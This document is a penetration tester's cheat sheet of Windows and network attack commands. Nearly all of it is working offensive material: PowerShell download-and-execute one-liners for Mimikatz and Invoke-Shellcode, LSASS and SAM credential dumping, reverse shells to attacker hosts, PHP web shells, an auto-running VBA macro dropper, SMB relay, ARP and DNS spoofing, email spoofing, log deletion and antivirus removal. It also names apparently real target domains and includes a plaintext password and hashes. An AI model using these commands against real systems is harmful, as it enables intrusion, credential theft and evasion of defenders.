- NOTE: almost every one-liner below fetches a script from a public repo's master branch at run time and feeds it straight to IEX. Pin a reviewed commit (or host a vetted copy on infrastructure you control) so an upstream change cannot run arbitrary code on the client's hosts, and record exactly what was executed for the report.
- powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks   (-Version 2 only works where the optional PowerShell 2.0 engine is still installed; drop it if powershell refuses to start)
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-UserHunter
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetLocalGroup
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-EnumerateLocalAdmin
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-StealthUserHunter
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-LocalAdminAccess
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1'); Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit"
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-FileFinder
- powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1');
- BloodHound:
- powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1');Invoke-Bloodhound -CSVFolder C:\Temp
- ---
- powershell_shell: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath c:\temp
- meterpreter > download c:\\temp\\lsass_632.dmp   (the path must match -DumpFilePath above; the file appears to be named <process>_<pid>.dmp, so the pid will differ per host - the dump contains credentials, treat and delete it like loot)
- python -m SimpleHTTPServer 9000
- sekurlsa::Minidump lsassdump.dmp   (use the name of the dump you actually downloaded)
- sekurlsa::logonPasswords
- recon and finding other networks:
- fping -g 192.168.0.0/16 | grep -a "alive"   (fping needs -g to expand a CIDR range, as in the later example; a /16 is ~65k probes, so this is slow and very noisy)
- ---
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1');
- powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.22.45:8080/')
- reg.exe save hklm\sam c:\temp\sam.save
- reg.exe save hklm\security c:\temp\security.save
- reg.exe save hklm\system c:\temp\system.save
- root@kali:~# nmap 190.57.29.177 -v -Pn -sT -A -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
- BDFproxy:
- veil option - #50
- echo 1 > /proc/sys/net/ipv4/ip_forward
- ./bdf_proxy.py
- iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
- iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
- msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.22.75; set LPORT 4444; set exitonsession false; exploit -j"
- arpspoof -i eth0 -t target.ip router.ip
- arpspoof -i eth0 -t router.ip target.ip
- msfconsole -r bdfproxy_msf_resource.rc
- nmap -A -oG - 190.57.29.0/24 -p 445 --osscan-guess | grep -a "Windows Server"
- IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1"); Invoke-Inveigh -ConsoleOutput Y -NBNS Y -ConsoleStatus 1
- procdump -ma lsass.exe lsass.dmp
- powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetUser -AdminCount | Select name,whencreated,pwdlastset,lastlogon"
- ***
- sudo msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set LPORT 443; set exitonsession false; exploit -j"
- powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost aws.shellgam3.com -Lport 443"
- rubber ducky:
- java -jar duckencode.jar -i "reverse shell.txt"
- smbrelay:
- msfconsole -x "use exploit/multi/script/web_delivery; set target 2; set URIPATH /; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.22.62; set exitonsession false; exploit -j"
- ./responder.py -I eth0
- ./smbrelayx.py -h 192.168.22.151 -c "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.22.119:8080/')"
- "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
- pth-winexe -U gp-wks-conf2/Administrator%aad3b435b51404eeaad3b435b51404ee:6154da6030a803632a63b1a0e1a3aeb3 //192.168.22.46 cmd
- nbtscan -r 192.168.22.0/24
- fping -g -d 192.168.23.0/24 2>/dev/null | grep alive
- capture ntlm handshake (snarf + responder)
- crack password from handshake (john)
- password spray to find local admin (metasploit)
- establish shells with local admin boxes (metasploit)
- snarf + responder:
- nodejs snarf.js 192.168.22.62 -d 192.168.22.41
- john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt
- responder -I eth0
- find local admin (post exploit):
- use auxiliary/scanner/smb/smb_login
- set smbdomain <domain>
- set smbuser <username>
- set smbpass <password>
- set rhosts 0.0.0.0/24   (replace with the target subnet)
- Shell:
- msfconsole: use exploit/windows/smb/psexec
- msfconsole: set payload windows/meterpreter/reverse_https
- run post/windows/gather/smart_hashdump
- dumping creds/hashes:
- run post/windows/gather/cachedump
- run post/windows/gather/smart_hashdump
- load mimikatz > wdigest   (cleartext WDigest creds only exist where UseLogonCredential is still enabled; it is off by default on patched/modern Windows, so expect hashes only. Newer Metasploit replaces this extension with "load kiwi")
- cracking hashes:
- john --format=mscash2 --wordlist=/media/sf_Shared/wordlists/rockyou.txt --rules=all gp_hashes.txt
- john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt
- password spraying:   (check the lockout policy with "net accounts /domain" first; one password per pass across all users keeps you under the threshold)
- http://www.blackhillsinfosec.com/?p=4989
- @FOR /F %s in (systems.txt) DO @net use \\%s\C$ /user:.\Administrator AdminPass 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use /delete \\%s\C$ > NUL   (one line; tries the local Administrator password against every host in systems.txt and records the ones it worked on)
- rpcclient:
- http://carnal0wnage.attackresearch.com/2010/06/more-with-rpcclient.html
- find local DC first, then ->
- rpcclient -U "" -N <ip addr of DC>
- commands: ?
- xfreerdp /u:jwelkley /p:GoBears1 /d:gp /v:192.168.2.60 /sec:rdp   (don't keep real credentials in a shared note; omit /p: and xfreerdp prompts for the password, which also keeps it out of shell history and ps output)
- metasploit basics:
- gain access
- getuid
- getpid
- sysinfo
- run PS
- migrate process
- Reverse Meterpreter Shell:
- ubuntu@ip-172-31-18-189:/opt/metasploit-framework$ ./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set LPORT 8443; run"   (the handler option is LPORT, not PORT; "set PORT" was silently ignored and only worked because 8443 is the reverse_https default)
- powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost aws.shellgam3.com -Lport 8443"
- Dump wireless PSKs:
- (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
- DNS subdomain enumeration:
- dnsrecon -d wabt.com -D /media/sf_Shared/wordlists/SecLists/Discovery/DNS/deepmagic.com_top50kprefixes.txt -t brt -f -n 8.8.8.8 --iw | grep -v 123.123.123.123
- ./proxychains4 nmap -p 53 -v -Pn -sT -n 8.8.8.8 -e eth0   (must be a connect scan: -sS/-sN and ping probes use raw sockets that bypass proxychains and expose your real IP; -n keeps nmap from resolving names outside the proxy)
- snarf + responder:
- nodejs snarf.js 192.168.22.62 -d 192.168.22.41
- john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt
- responder -I eth0
- MiTM:
- netstat -nr
- echo 1 > /proc/sys/net/ipv4/ip_forward
- arpspoof -i eth0 -t target.ip router.ip
- arpspoof -i eth0 -t router.ip target.ip
- MiTM via mitmf:
- mitmf -i eth0 --arp --spoof --hsts --gateway=10.0.0.1 --target=192.168.0.1
- Beef:
- ./beef
- mitmf -i eth0 --arp --spoof --hsts --gateway=192.168.0.1 --target=192.168.0.2 --inject --js-url http://192.168.0.5:300/hook.js
- DNS subdomain brute forcing:
- dnsrecon -d wpcu.coop -D /media/sf_Shared/wordlists/SecLists/Discovery/DNS/deepmagic.com_top50kprefixes.txt -t brt -f -n 8.8.8.8 --iw | grep -v 123.123.123.123
- Certificate injection:
- mitm +
- mitmproxy -T --host
- PtH with Metasploit:
- Kali: 173.18.131.94
- Victim: 173.18.131.111
- root@kali:/usr/bin# ./msfconsole
- msf > use exploit/windows/smb/psexec
- msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
- payload => windows/meterpreter/reverse_tcp
- msf exploit(psexec) > set lhost 173.18.131.94
- lhost => 173.18.131.94
- msf exploit(psexec) > set rhost 173.18.131.111
- rhost => 173.18.131.111
- msf exploit(psexec) > set smbpass 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
- smbpass => 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
- msf exploit(psexec) > set smbuser administrator
- smbuser => administrator
- msf exploit(psexec) > set smbdomain test
- smbdomain => test
- msf exploit(psexec) > exploit
- smb relay attack:
- Metasploit box: 172.17.130.81
- Domain Admin Workstation: 172.17.130.33
- Target Server: 172.17.130.75
- msfconsole -x "use exploit/windows/smb/smb_relay; set payload windows/meterpreter/reverse_tcp; set LHOST 172.17.130.81;set SMBHOST 172.17.130.75; set SRVHOST 172.17.130.81; run"   (straight ASCII quotes - the curly quotes from copy/paste are not quotes to the shell)
- -embed in email message:
- <html>
- <head>
- <img src="\\172.17.130.81\test.jpg"></img>
- </head>
- </html>
- spoofing email via telnet:
- root@kali:~# telnet mx1.mail.icloud.com 25
- Trying 17.158.8.67…
- Connected to mx1.mail.icloud.com.
- Escape character is '^]'.
- 220 nk11p00mm-smtpin001.mac.com — Server ESMTP (Oracle Communications Messaging Server 7.0.5.36.0 64bit (built Sep 8 2015))
- helo whatever.com
- 250 nk11p00mm-smtpin001.mac.com OK, 50-197-245-29-static.hfc.comcastbusiness.net [XX.197.XXX.29].
- mail from:bob@icloud.com
- 250 2.5.0 Address Ok.
- rcpt to:nickvangilder@icloud.com
- 250 2.1.5 nickvangilder@icloud.com OK.
- data
- 354 Enter mail, end with a single ".".
- To:Nick VanGilder<nickvangilder@icloud.com>
- From:Bob Dole<bob@icloud.com>
- Reply-To:Bob Dole<nickvangilder@outlook.com>
- Subject:Test
- This is a test
- .
- 250 2.5.0 Ok.
- check public ip address:
- proxychains curl ipecho.net/plain
- powershell
- import-module activedirectory
- get-aduser -filter {PasswordNeverExpires -eq $True -AND Enabled -eq $True} -properties PasswordLastSet | Sort PasswordLastSet | Select Distinguishedname,PasswordLastSet
- on linux box: nc -lvp 8443   (the listener port must match the port the PowerShell client dials - the first example below uses 4444, the one-liner 8443; the channel is plaintext and unauthenticated, so anything on the path can read or hijack it)
- powershell ->
- $client = New-Object System.Net.Sockets.TCPClient("aws.shellgam3.com",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- powershell -nop -exec bypass -file payload.ps1
- one-liner:
- powershell -Command "& {$client = New-Object System.Net.Sockets.TCPClient('192.168.22.63',8443);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"
- To enumerate all domain controllers:
- nltest /dclist:domain.local
- Enumerate local admins:
- net localgroup Administrators
- Get-ADDefaultDomainPasswordPolicy
- net group "domain admins" /domain
- Fetch a file via HTTP (wget in PowerShell): PS C:\> (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe","nc.exe")
- wmic computersystem get model,name,manufacturer,systemtype
- File injection:
- MiTM +
- iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
- ./mitmproxy -T -s "iframe_injector.py http://www.website.com/files/malicious_file.xlsm"   (-T is the old transparent-mode flag; recent mitmproxy releases use --mode transparent instead)
- cmdkey.exe /add:MACHINE_NAME_HERE /user:MACHINE_NAME_HERE\Administrator /pass:PASSWORD_HERE
- cmdkey.exe /delete:MACHINE_NAME_HERE
- https://download.sysinternals.com/files/PSTools.zip
- copy file to target
- psexec \\target -u username -p password cmd.exe
- start c:\path\payload.vbs
- Enable RDP:   (the host firewall must also allow TCP 3389; set the value back to 1 when finished - see Disable RDP below)
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- Disable RDP:
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
- web app recon and scanning:
- proxychains, proxychains4, torify, tor-resolve
- service tor start
- service tor status
- dont forget to point /etc/resolv.conf at 127.0.0.1 (a local resolver that forwards over Tor) so name lookups don't leak around the proxy
- protect against accidental disclosure = sudo iptables -A OUTPUT --dest <target> -j DROP   (drops any packet from this box that would reach the target directly, so only the proxied path remains)
- proxychains nmap -v -sT -n 207.223.121.128 -Pn   (must be a connect scan: -sN/-sS send raw packets that bypass proxychains and reveal your real IP, defeating the rule above)
- nmap ip.adddress -v -Pn -sT
- nmap -sV -T4 hostname.com   (-sV = version detection; "-Sv" would be read as a spoofed source address)
- dirb https://www.example.com
- grabber --url www.site.com --spider 1 --sql
- uniscan -d -u test.com
- /usr/share/zaproxy# java -DsocksProxyHost=127.0.0.1 -DsocksProxyPort=9050 -jar zap-2.4.1.jar
- nikto -h http://www.site.com
- whatweb test.com
- w3af_console
- wpscan
- sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --risk=3 --level=5 --threads=10 --dbs --dump -D Database_name -T table_name -u http://xxxxx.com/board/board.php?id=6   (--risk=3 enables payloads that can modify data; confirm that is in scope before running it against production)
- sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --threads=10 --crawl=2 --risk=3 --level=5 --dump -u http://host.com/board.php?id=6
- sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --dump -u https://test.com --sql-shell
- sqlmap --tor --tor-type=socks5 --check-tor --random-agent --keep-alive --forms --crawl=2 --risk=3 --threads=4 --batch -f --dbs -u https://review.logicforce.com
- sqlmap --random-agent --keep-alive --level=5 --forms --crawl=2 --risk=3 --threads=10 --batch -f --dump --dbs -u https://xxxxxxx.com
- sqlmap --random-agent --keep-alive --forms --crawl=2 --risk=3 --threads=10 --level=5 --batch -f --dbs -u http://human.firstcommunitymortgage.com/fha-loans/?gcf_captcha
- Look for HTTP PUT:
- curl -X OPTIONS -v http://200.x.x.x/test/
- UPLOAD FILE:
- curl --upload-file /root/Desktop/reverse_shell.php -v --url http://172.17.130.93/test/rshell.php -0 --http1.0
- curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.victim.com/newpage
- curl -X PUT -d "text or data to put" http://www.victim.com/destination_page
- curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://victim.com/new_page
- first put this into cmd.php:   (an unauthenticated web shell - anyone who finds the URL gets command execution; remove it and rshell.php when the test is done)
- <?php echo system($_GET["cmd"]); ?>
- THEN, for shell access:
- this one worked:
- put this in filename.sh
- http://172.17.130.93/test/cmd.php?cmd=filename.sh
- $ exec 5<>/dev/tcp/evil.com/8080
- $ cat <&5 | while read line; do $line 2>&5 >&5; done
- Macro enabled xlsm:
- ubuntu@ip-172-31-18-189:/opt/metasploit-framework$ ./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set PORT 8443; run"
- Private Sub Auto_Open()
- strCommand = "powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost 52.x.x.123 -Lport 8443"   ' no space before the closing quote of the URL or the download fails
- Set WshShell = CreateObject("WScript.Shell")
- Set WshShellExec = WshShell.Exec(strCommand)
- End Sub
- DNS Spoofing:
- #IP Forwarding
- echo 1 > /proc/sys/net/ipv4/ip_forward
- #DNS Port Redirection
- iptables -A INPUT -i eth0 -p udp --dport 53 -j ACCEPT
- iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53
- #ARP Cache Poisoning / MitM
- arpspoof -i eth0 -t victimIP routerIP
- arpspoof -i eth0 -t routerIP victimIP
- #DNS Spoofing
- dnschef -i 172.17.130.60 --fakeip=52.37.49.217 --fakedomains=test.com
- #172.17.130.60 = my internal Kali box
- #Fake IP = where you want to redirect to
- #Fake Domains = name of domain to redirect
- View your current user: whoami
- View information about the current user: net user myuser(for a local user)
- net user myuser /domain (for a domain user)
- View the local groups: net localgroup
- View the local administrators: net localgroup Administrators
- Add a new user: net user myuser mypass /add
- Add a user in the local Administrators group: net localgroup Administrators myuser /add
- View the domain name of current machine: net config workstation
- net config server
- View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History" /v DCName
- View the list of domain admins: net group "Domain Admins" /domain
- View the list of started services (search for antivirus): net start
- sc query
- Stop a service: net stop "Symantec Endpoint Protection"
- View the list of started processes and the owner: tasklist /v
- Kill a process by its name taskkill /F /IM "cmd.exe"
- Abort a shutdown/restart countdown shutdown /a
- Create php backdoor/shell echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
- View established connections of current machine: netstat -a -n -p tcp | find "ESTAB"
- View open ports of current machine: netstat -a -n -p tcp | find "LISTEN"
- netstat -a -n -p udp
- View network configuration: netsh interface ip show addresses
- netsh interface ip show route
- netsh interface ip show neighbors
- View current network shares: net share
- Mount a remote share with the rights of the current user: net use K: \\10.1.2.3\C$
- dir K:
- Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- Blind Files
- %SYSTEMDRIVE%\boot.ini
- A file present on XP/2003-era hosts; Vista and later boot from BCD and have no boot.ini, so fall back to win.ini below. Helps confirm that a read is actually happening.
- %WINDIR%\win.ini
- This is another file to look for if boot.ini isn’t there or coming back, which is some times the case.
- %SYSTEMROOT%\repair\SAM
- %SYSTEMROOT%\System32\config\RegBack\SAM
- It stores users' passwords in a hashed format (LM hash and NTLM hash). The live SAM is locked, but a copy can be retrieved with forensic tools or from a Volume Shadow Copy
- %SYSTEMROOT%\repair\system
- %SYSTEMROOT%\System32\config\RegBack\system
- System
- whoami /all
- set
- fsutil fsinfo drives
- reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """"
- ipconfig /all
- ipconfig /displaydns
- netstat -nabo
- netstat -s -p [tcp|udp|icpm|ip]
- netstat -r
- netstat -na | findstr :445
- netstat -nao | findstr LISTENING
- netstat -nao | findstr LISTENING
- netstat -na | findstr LISTENING
- netsh diag show all
- net view
- net view /domain
- net view /domain:otherdomain
- net user %USERNAME% /domain
- net user /domain
- net accounts
- net accounts /domain
- net localgroup administrators
- net localgroup administrators /domain
- net group "Domain Admins" /domain
- net group "Enterprise Admins" /domain
- net group "Domain Controllers" /domain
- nbtstat -a [ip here]
- net share
- net session | find "\\"
- arp -a
- route print
- browstat (Not working on XP)
- netsh wlan show profiles
- shows all saved wireless profiles. You may then export the info for those profiles with the command below
- netsh wlan export profile folder=. key=clear
- netsh wlan [start|stop] hostednetwork
- netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary
- netsh wlan set hostednetwork mode=[allow|disallow]
- wmic ntdomain list Retrieve information about Domain and Domain Controller
- gpresult /z
- sc qc
- sc query
- sc queryex
- type %WINDIR%\System32\drivers\etc\hosts
- echo %COMSPEC%
- c:\windows\system32\gathernetworkinfo.vbs
- tree C:\ /f /a > C:\output_of_tree.txt
- dir /a
- dir /b /s [Directory or Filename]
- dir \ /s /b | find /I "searchstring"
- %WINDIR%\system32\config\AppEvent.Evt
- %WINDIR%\system32\config\SecEvent.Evt
- %WINDIR%\system32\config\default.sav
- %WINDIR%\system32\config\security.sav
- %WINDIR%\system32\config\software.sav
- %WINDIR%\system32\config\system.sav
- %WINDIR%\system32\CCM\logs\*.log
- %USERPROFILE%\ntuser.dat
- %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
- %WINDIR%\System32\drivers\etc\hosts
- unattend.txt, unattend.xml, sysprep.inf
- net share \\computername
- tasklist /V /S computername
- qwinsta /SERVER:computername
- qprocess /SERVER:computername *
- net use \\computername
- net use \\computername /user:DOMAIN\username password
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
- net time \\computername (Shows the time of target computer)
- dir \\computername\share_or_admin_share\ (dir list a remote directory)
- tasklist /V /S computername
- Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount
- WMI
- wmic bios
- wmic qfe get hotfixid   (installed patches)
- wmic startup
- wmic service
- wmic process get caption,executablepath,commandline
- wmic process call create "process_name" (executes a program)
- wmic process where name="process_name" call terminate (terminates program)
- wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
- wmic useraccount (usernames, sid, and various security related goodies)
- wmic useraccount get /ALL
- wmic share get /ALL (you can use ? for gets help ! )
- wmic startup list full (this can be a huge list!!!)
- wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)
- reg save HKLM\Security security.hive (Save security hive to a file)
- reg save HKLM\System system.hive (Save system hive to a file)
- reg save HKLM\SAM sam.hive (Save sam to a file)
- reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
- reg export [RegDomain]\[Key] [FileName]
- reg import [FileName ]
- reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (add /s to recurse through all values)
- Deleting Logs   (anti-forensic and destructive - only with explicit authorization in the rules of engagement; clearing the Security log itself leaves a "log cleared" event, so it is rarely stealthy)
- wevtutil el (list logs)
- wevtutil cl <LogName> (clear the named log)
- del %WINDIR%\*.log /a /s /q /f
- Uninstalling Software “AntiVirus” (Non interactive)
- wmic product get name /value (this gets software names)
- wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software)
- # Other (to be sorted)
- pkgmgr /iu:"Package"   (installs an optional Windows component; use straight ASCII quotes)
- pkgmgr /iu:"TelnetServer" (Install Telnet Service ...)
- pkgmgr /iu:”TelnetClient” (Client )
- rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
- wscript.exe <script js/vbs>
- cscript.exe <script js/vbs/c#>
- Vista/7
- winstat features
- wbadmin get status
- wbadmin get items
- gpresult /H gpols.htm
- bcdedit /export <filename>
- #Disables the local windows firewall
- netsh firewall set opmode disable   (legacy syntax; on Windows 7/2008 R2 and later use: netsh advfirewall set allprofiles state off)
- #Enables the local windows firewall. If rules are not in place for your connection, this could cause you to lose it.
- netsh firewall set opmode enable   (modern equivalent: netsh advfirewall set allprofiles state on)
- @FOR /F %n in (users.txt) DO @FOR /F %p in (password.txt) DO @net use \\192.168.200.1 /user:domain\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\192.168.200.1\IPC$ > NUL   (every password in password.txt is tried against every user - keep the list shorter than the lockout threshold from "net accounts /domain" or you will lock out the domain)